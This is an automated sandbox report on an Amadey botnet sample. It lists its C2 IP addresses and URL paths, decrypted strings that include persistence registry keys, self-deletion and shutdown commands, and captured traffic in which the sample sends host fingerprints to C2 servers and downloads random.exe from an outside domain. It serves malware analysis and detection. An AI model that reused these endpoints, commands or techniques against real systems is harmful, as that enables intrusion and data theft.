Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1470923
MD5:233ea23b1c1587f1cf895f08ba6da10b
SHA1:e2b5131d03aa3bc56a004ba6debc6d57322e0691
SHA256:c7e20eafa32a38282616d78c43c574991d30fe2fbc876141fa76e5ff538c3b5c
Tags:exe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3916 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 233EA23B1C1587F1CF895F08BA6DA10B)
    • WerFault.exe (PID: 508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 856 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3300 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 864 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6244 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1048 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1180 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1204 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • Hkbsse.exe (PID: 1924 cmdline: "C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe" MD5: 233EA23B1C1587F1CF895F08BA6DA10B)
      • WerFault.exe (PID: 2720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 476 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1212 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • Hkbsse.exe (PID: 6912 cmdline: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe MD5: 233EA23B1C1587F1CF895F08BA6DA10B)
    • WerFault.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 536 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 556 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 532 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.209.162.226/hb9IvshS03/index.php", "Version": "4.41"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1340:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x11f0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000021.00000002.2879671000.0000000002B63000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1500:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000021.00000003.2753930004.0000000004580000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000017.00000003.2238394423.0000000004530000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      Click to see the 11 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      23.3.Hkbsse.exe.4530000.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        23.2.Hkbsse.exe.400000.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          23.3.Hkbsse.exe.4530000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            33.3.Hkbsse.exe.4580000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0.2.file.exe.44c0e67.1.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                Click to see the 13 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:07/10/24-17:36:06.824712
                SID:2856147
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/10/24-17:36:11.618807
                SID:2856122
                Source Port:80
                Destination Port:49729
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/10/24-17:36:13.149160
                SID:2044696
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 23.2.Hkbsse.exe.400000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "185.209.162.226/hb9IvshS03/index.php", "Version": "4.41"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: 185.208.158.116
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: /hb9IvshS01/index.php
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: 89.23.103.42
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: /hb9IvshS02/index.php
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: 185.209.162.226
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: /hb9IvshS03/index.php
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: S-%lu-
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: 3bca58cece
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Hkbsse.exe
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Startup
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: cmd /C RMDIR /s/q
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: rundll32
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Programs
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: %USERPROFILE%
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: cred.dll|clip.dll|
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: cred.dll
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: clip.dll
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: http://
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: https://
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: /quiet
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: /Plugins/
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: &unit=
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: shell32.dll
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: kernel32.dll
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: GetNativeSystemInfo
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: ProgramData\
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: AVAST Software
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Kaspersky Lab
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Panda Security
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Doctor Web
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: 360TotalSecurity
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Bitdefender
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Norton
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Sophos
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Comodo
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: WinDefender
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: 0123456789
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: ------
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: ?scr=1
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: ComputerName
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: -unicode-
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: VideoID
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: DefaultSettings.XResolution
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: DefaultSettings.YResolution
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: ProductName
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: CurrentBuild
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: rundll32.exe
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: "taskkill /f /im "
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: " && timeout 1 && del
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: && Exit"
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: " && ren
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: Powershell.exe
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: -executionpolicy remotesigned -File "
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: shutdown -s -t 0
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: random
                Source: 23.2.Hkbsse.exe.400000.0.unpackString decryptor: 6HiB\%

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeUnpacked PE file: 23.2.Hkbsse.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeUnpacked PE file: 33.2.Hkbsse.exe.400000.0.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043DCB0 FindFirstFileExW,0_2_0043DCB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044FDF17 FindFirstFileExW,0_2_044FDF17
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0043DCB0 FindFirstFileExW,23_2_0043DCB0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044BDF17 FindFirstFileExW,23_2_044BDF17
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0043DCB0 FindFirstFileExW,33_2_0043DCB0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0454DF17 FindFirstFileExW,33_2_0454DF17

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:49725 -> 185.208.158.116:80
                Source: TrafficSnort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 89.23.103.42:80 -> 192.168.2.6:49729
                Source: TrafficSnort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.6:49734 -> 89.23.103.42:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 185.209.162.226
                Source: global trafficHTTP traffic detected: GET /am/random.exe HTTP/1.1Host: fellzobr.com
                Source: global trafficHTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.208.158.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /hb9IvshS02/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 89.23.103.42Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
                Source: global trafficHTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /hb9IvshS02/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 89.23.103.42Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
                Source: global trafficHTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
                Source: global trafficHTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.208.158.116Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
                Source: global trafficHTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /hb9IvshS02/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 89.23.103.42Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 34 30 38 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004081&unit=246122658369
                Source: global trafficHTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
                Source: global trafficHTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.208.158.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
                Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
                Source: Joe Sandbox ViewASN Name: HOSTING-SOLUTIONSUS HOSTING-SOLUTIONSUS
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.116
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.116
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.116
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.116
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.116
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.116
                Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.116
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 89.23.103.42
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.209.162.226
                Source: unknownTCP traffic detected without corresponding DNS query: 185.208.158.116
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A9D9 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,0_2_0040A9D9
                Source: global trafficHTTP traffic detected: GET /am/random.exe HTTP/1.1Host: fellzobr.com
                Source: global trafficDNS traffic detected: DNS query: fellzobr.com
                Source: unknownHTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.208.158.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php
                Source: Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php16
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpd
                Source: Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpq
